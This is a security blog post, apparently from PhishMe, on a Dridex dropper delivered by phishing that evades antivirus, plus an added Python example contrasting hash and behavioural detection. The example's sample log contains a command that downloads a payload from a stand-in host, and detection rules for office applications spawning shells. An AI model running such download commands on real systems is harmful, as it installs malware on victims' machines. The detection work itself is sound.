Detecting a Dridex Variant that Evades Anti-virus


Attackers constantly tweak their malware to avoid detection. The latest iteration of Dridex we’ve analyzed provides a great example of malware designed to evade anti-virus, sandboxing, and other detection technologies.

How did we get our hands on malware that went undetected by A/V? Since this malware (like the majority of malware) was delivered via a phishing email, we received the sample from a user reporting the phishing email using Reporter.

Here’s a screenshot of the phishing email sent to several of our users:

Figure 1 — Phishing email sent to internal users

In this specific example, the user is presented with a button to double-click in order to “display the content.”

Figure 2 — Button to double-click to view the content

Once double-clicked, the user is presented with a warning box.

Figure 3 — Warning box presented to the user

When the user clicks OK, a command shell is spawned in the background to download a sample of Dridex.

Figure 4 — Dridex being downloaded

How many AV products flag this file as malicious? Surprisingly, none of them.

Figure 5 — 0/57 A/V hits

Since user input is required to push the button, this bypasses sandbox technology as well. Once downloaded, the state of detection for Dridex is less grim, with 5/57 AV vendors picking up on it.

Figure 6 — A/V hits for Dridex sample
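The 0/57 result above shows why a hash or signature lookup on its own is not enough for this dropper. The following Python is an added example, not code from the PhishMe post: it contrasts a hash check against the two SHA-256 values from the VirusTotal links at the end of the post with a behavioural check for the chain the post describes, a command shell spawned in the background by a user-facing application to download a file. The process-log format, the list of parent applications, the sample log lines and the "new variant" bytes are all constructed assumptions for the example.

```python
"""Added example: hash-based vs behaviour-based detection of the Dridex dropper chain."""
import hashlib
import re
from dataclasses import dataclass

# SHA-256 values taken from the VirusTotal links in the post.
KNOWN_BAD_SHA256 = {
    "244126a2873c26f76d9dfa8f993b4209ac8a52fd00a91d98a23c0c90764d1a73",  # dropper
    "f2328ad463d584ba06cba3338d73b1ee2ba772401d51cf0c88c51aec53bd3623",  # Dridex sample
}

# Assumption: user-facing applications a phishing lure is opened in; extend per environment.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
COMMAND_SHELLS = {"cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed process-creation log (not real telemetry), tab separated:
# parent image <TAB> child image <TAB> child command line.
# Only the first line matches the chain described in the post; the other two are benign.
SAMPLE_LOG = """\
C:\\Program Files\\Microsoft Office\\WINWORD.EXE\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c getfile.vbs http://example.invalid/payload.exe
C:\\Windows\\explorer.exe\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c dir C:\\Users
C:\\Program Files\\Microsoft Office\\WINWORD.EXE\tC:\\Windows\\splwow64.exe\tsplwow64.exe 12288
"""


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(log_text: str) -> list[ProcessEvent]:
    """Parse the constructed tab-separated log into ProcessEvent records."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        parent, image, cmd = line.split("\t", 2)
        events.append(ProcessEvent(parent, image, cmd))
    return events


def hash_hit(sha256_hex: str) -> bool:
    """Indicator match: only catches files whose hash is already known."""
    return sha256_hex.lower() in KNOWN_BAD_SHA256


def behaviour_hit(ev: ProcessEvent) -> bool:
    """Behaviour match: a user-facing app spawns a shell whose command line carries a URL."""
    return (
        _basename(ev.parent_image) in USER_FACING_PARENTS
        and _basename(ev.image) in COMMAND_SHELLS
        and URL_RE.search(ev.command_line) is not None
    )


def triage(log_text: str, downloaded_file: bytes) -> dict:
    """Run both checks: hash the downloaded file, then scan the process log."""
    digest = hashlib.sha256(downloaded_file).hexdigest()
    flagged = [ev for ev in parse_events(log_text) if behaviour_hit(ev)]
    return {
        "sha256": digest,
        "hash_known_bad": hash_hit(digest),
        "behaviour_alerts": len(flagged),
    }


if __name__ == "__main__":
    # Constructed stand-in for a re-packed variant whose hash no vendor knows yet.
    new_variant = b"constructed placeholder bytes, not the real sample"
    print(triage(SAMPLE_LOG, new_variant))
```

The hash check returns true for the two hashes the post links and false for anything re-packed, which is exactly the gap the 0/57 result exposes; the behavioural check fires on the shell-with-URL event regardless of what the file hashes to, at the cost of needing process-creation telemetry with parent information.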

While there is no silver bullet to security, user-generated reports have proven very successful here at PhishMe and other organizations, as many of our users have reported new and interesting threats that target not just us, but industries worldwide. By hooking the human into the security program, we not only find new and interesting malware, but we also close the gap on the kill chain.

Dropper: https://www.virustotal.com/en/file/244126a2873c26f76d9dfa8f993b4209ac8a52fd00a91d98a23c0c90764d1a73/analysis/

Dridex sample: https://www.virustotal.com/en/file/f2328ad463d584ba06cba3338d73b1ee2ba772401d51cf0c88c51aec53bd3623/analysis/1427292890/
